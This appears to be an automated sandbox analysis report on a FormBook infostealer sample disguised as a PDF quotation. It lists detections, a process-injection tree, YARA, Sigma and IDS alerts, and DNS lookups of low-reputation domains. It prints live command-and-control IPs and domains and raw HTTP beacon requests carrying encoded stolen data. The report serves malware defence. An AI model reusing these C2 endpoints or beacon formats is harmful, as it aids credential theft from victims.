Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation request -30112024_pdf.exe

Overview

General Information

Sample name:Quotation request -30112024_pdf.exe
Analysis ID:1557571
MD5:8a44b6f23ceba13203e4dc3fb33aea3c
SHA1:1fd1641755f1df2d11f42e5176ebcf2c7684661a
SHA256:2166b87c378747df98dcbbb089b0d3a21cf5631e999e68447e804c4b48d25efb
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Quotation request -30112024_pdf.exe (PID: 4348 cmdline: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe" MD5: 8A44B6F23CEBA13203E4DC3FB33AEA3C)
    • svchost.exe (PID: 4876 cmdline: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • xvYhLzczmazJ.exe (PID: 5488 cmdline: "C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_isv.exe (PID: 4552 cmdline: "C:\Windows\SysWOW64\RMActivate_isv.exe" MD5: CB999CC05F196DCF7300A5D534B3BE7B)
          • xvYhLzczmazJ.exe (PID: 3736 cmdline: "C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2324 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.1643178908.0000000006880000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.3137237939.0000000005230000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.3134393651.0000000003290000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000B.00000002.3130613752.0000000002E00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.3134403470.0000000003B70000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              7.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", CommandLine: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe, ParentProcessId: 4348, ParentProcessName: Quotation request -30112024_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", ProcessId: 4876, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", CommandLine: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe, ParentProcessId: 4348, ParentProcessName: Quotation request -30112024_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", ProcessId: 4876, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T13:12:53.485931+010028554651A Network Trojan was detected192.168.2.75311547.76.213.19780TCP
                2024-11-18T13:13:17.093699+010028554651A Network Trojan was detected192.168.2.75315213.248.169.4880TCP
                2024-11-18T13:13:31.532538+010028554651A Network Trojan was detected192.168.2.753156176.117.73.10480TCP
                2024-11-18T13:13:45.053482+010028554651A Network Trojan was detected192.168.2.75316013.248.169.4880TCP
                2024-11-18T13:13:59.085864+010028554651A Network Trojan was detected192.168.2.753164107.167.84.4280TCP
                2024-11-18T13:14:13.078566+010028554651A Network Trojan was detected192.168.2.753168176.32.38.13080TCP
                2024-11-18T13:14:27.024295+010028554651A Network Trojan was detected192.168.2.753172161.97.142.14480TCP
                2024-11-18T13:14:41.324493+010028554651A Network Trojan was detected192.168.2.753176203.161.46.20580TCP
                2024-11-18T13:14:56.235004+010028554651A Network Trojan was detected192.168.2.75318020.2.36.11280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T13:13:09.437341+010028554641A Network Trojan was detected192.168.2.75314913.248.169.4880TCP
                2024-11-18T13:13:11.999199+010028554641A Network Trojan was detected192.168.2.75315013.248.169.4880TCP
                2024-11-18T13:13:14.530180+010028554641A Network Trojan was detected192.168.2.75315113.248.169.4880TCP
                2024-11-18T13:13:23.094046+010028554641A Network Trojan was detected192.168.2.753153176.117.73.10480TCP
                2024-11-18T13:13:25.812830+010028554641A Network Trojan was detected192.168.2.753154176.117.73.10480TCP
                2024-11-18T13:13:28.640925+010028554641A Network Trojan was detected192.168.2.753155176.117.73.10480TCP
                2024-11-18T13:13:37.411117+010028554641A Network Trojan was detected192.168.2.75315713.248.169.4880TCP
                2024-11-18T13:13:39.960092+010028554641A Network Trojan was detected192.168.2.75315813.248.169.4880TCP
                2024-11-18T13:13:42.463269+010028554641A Network Trojan was detected192.168.2.75315913.248.169.4880TCP
                2024-11-18T13:13:51.201404+010028554641A Network Trojan was detected192.168.2.753161107.167.84.4280TCP
                2024-11-18T13:13:53.754465+010028554641A Network Trojan was detected192.168.2.753162107.167.84.4280TCP
                2024-11-18T13:13:56.424552+010028554641A Network Trojan was detected192.168.2.753163107.167.84.4280TCP
                2024-11-18T13:14:05.141058+010028554641A Network Trojan was detected192.168.2.753165176.32.38.13080TCP
                2024-11-18T13:14:07.781687+010028554641A Network Trojan was detected192.168.2.753166176.32.38.13080TCP
                2024-11-18T13:14:10.517191+010028554641A Network Trojan was detected192.168.2.753167176.32.38.13080TCP
                2024-11-18T13:14:19.154386+010028554641A Network Trojan was detected192.168.2.753169161.97.142.14480TCP
                2024-11-18T13:14:21.698796+010028554641A Network Trojan was detected192.168.2.753170161.97.142.14480TCP
                2024-11-18T13:14:24.360270+010028554641A Network Trojan was detected192.168.2.753171161.97.142.14480TCP
                2024-11-18T13:14:33.633607+010028554641A Network Trojan was detected192.168.2.753173203.161.46.20580TCP
                2024-11-18T13:14:36.188442+010028554641A Network Trojan was detected192.168.2.753174203.161.46.20580TCP
                2024-11-18T13:14:38.756479+010028554641A Network Trojan was detected192.168.2.753175203.161.46.20580TCP
                2024-11-18T13:14:48.594377+010028554641A Network Trojan was detected192.168.2.75317720.2.36.11280TCP
                2024-11-18T13:14:51.141237+010028554641A Network Trojan was detected192.168.2.75317820.2.36.11280TCP
                2024-11-18T13:14:53.656857+010028554641A Network Trojan was detected192.168.2.75317920.2.36.11280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Quotation request -30112024_pdf.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: Quotation request -30112024_pdf.exeReversingLabs: Detection: 63%
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.1643178908.0000000006880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3137237939.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3134393651.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3130613752.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3134403470.0000000003B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1641218754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3134574203.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1642068110.0000000004A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Quotation request -30112024_pdf.exeJoe Sandbox ML: detected
                Source: Quotation request -30112024_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xvYhLzczmazJ.exe, 0000000A.00000000.1561536330.00000000000EE000.00000002.00000001.01000000.00000005.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1722910301.00000000000EE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Quotation request -30112024_pdf.exe, 00000002.00000003.1298534176.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, Quotation request -30112024_pdf.exe, 00000002.00000003.1299779489.0000000004490000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1641673492.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1546649019.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1641673492.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1544927146.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1641739098.0000000003165000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.000000000365E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1644453148.000000000331A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Quotation request -30112024_pdf.exe, 00000002.00000003.1298534176.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, Quotation request -30112024_pdf.exe, 00000002.00000003.1299779489.0000000004490000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1641673492.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1546649019.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1641673492.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1544927146.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, RMActivate_isv.exe, 0000000B.00000003.1641739098.0000000003165000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.000000000365E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1644453148.000000000331A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rmactivate_isv.pdb source: svchost.exe, 00000007.00000003.1605760726.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1605855367.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576053827.000000000420D000.00000004.00000001.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576936987.00000000042AA000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: rmactivate_isv.pdbGCTL source: svchost.exe, 00000007.00000003.1605760726.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1605855367.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576053827.000000000420D000.00000004.00000001.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576936987.00000000042AA000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3135956729.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723645888.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2000496930.00000000288EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3135956729.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723645888.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2000496930.00000000288EC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,2_2_004339B6
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00452492
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00442886
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_004788BD
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,2_2_0045CAFA
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00431A86
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,2_2_0044BD27
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0045DE8F FindFirstFileW,FindClose,2_2_0045DE8F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0044BF8B
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E1C380 FindFirstFileW,FindNextFileW,FindClose,11_2_02E1C380
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 4x nop then xor eax, eax11_2_02E09EE0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 4x nop then pop edi11_2_02E0E033
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 4x nop then mov ebx, 00000004h11_2_033E04DF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53115 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53152 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53156 -> 176.117.73.104:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53160 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53157 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53151 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53153 -> 176.117.73.104:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53149 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53158 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53165 -> 176.32.38.130:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53154 -> 176.117.73.104:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53166 -> 176.32.38.130:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53173 -> 203.161.46.205:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53159 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53174 -> 203.161.46.205:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53162 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53163 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53177 -> 20.2.36.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53170 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53179 -> 20.2.36.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53150 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53175 -> 203.161.46.205:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53180 -> 20.2.36.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53167 -> 176.32.38.130:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53155 -> 176.117.73.104:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53164 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53169 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53168 -> 176.32.38.130:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53161 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53176 -> 203.161.46.205:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53171 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53172 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53178 -> 20.2.36.112:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.egyshare.xyz
                Source: DNS query: www.tals.xyz
                Source: DNS query: www.acc888ommodate.xyz
                Source: DNS query: www.070002018.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: Joe Sandbox ViewASN Name: VODAFONE-TRANSIT-ASVodafoneNZLtdNZ VODAFONE-TRANSIT-ASVodafoneNZLtdNZ
                Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004422FE InternetQueryDataAvailable,InternetReadFile,2_2_004422FE
                Source: global trafficHTTP traffic detected: GET /yysf/?0PIXBf9=6v+kdCMiu5/5470MX9lzQyj8/+WeB1VHD3zgv43+rVSd7gkLKIFyovo7JjBoxgRqvXZx1v1SEu244MoSpwzCrGiBlqOxipli+BYTnOI67OOyvHeuq/FHXkVErKkJ9HuzEweZBdUTs+cq&tD_=f00xUVKh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ytsd88.topUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /lu7u/?tD_=f00xUVKh&0PIXBf9=yZTmjXW21Nq5wh91IMf/kDRGkUZ+XT2lkv3n4X6DMmMz0B5xbYyQHfDnacj01uuzec64BAri/1xnyBkH0yVWWE7yUWUVCQJ95ExXsfUTBKKOk42MManlE2uXf/wCPPD1XSw9siMiJ2ze HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.egyshare.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /i6zb/?0PIXBf9=6B2/7Ngl58s2pznOHRe+vJ9NgeSMQEkiwdm42/mNvrNW/DcFgEbztbyoGAni7ddU1GsG6dsX45s7M+CgnpRasEd6qu0hZk1EhvCSzFnjn53BAZCqqKYjVrue1TDSDBq9qg8+DFp/ZHMc&tD_=f00xUVKh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.bionanosolutions.infoUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
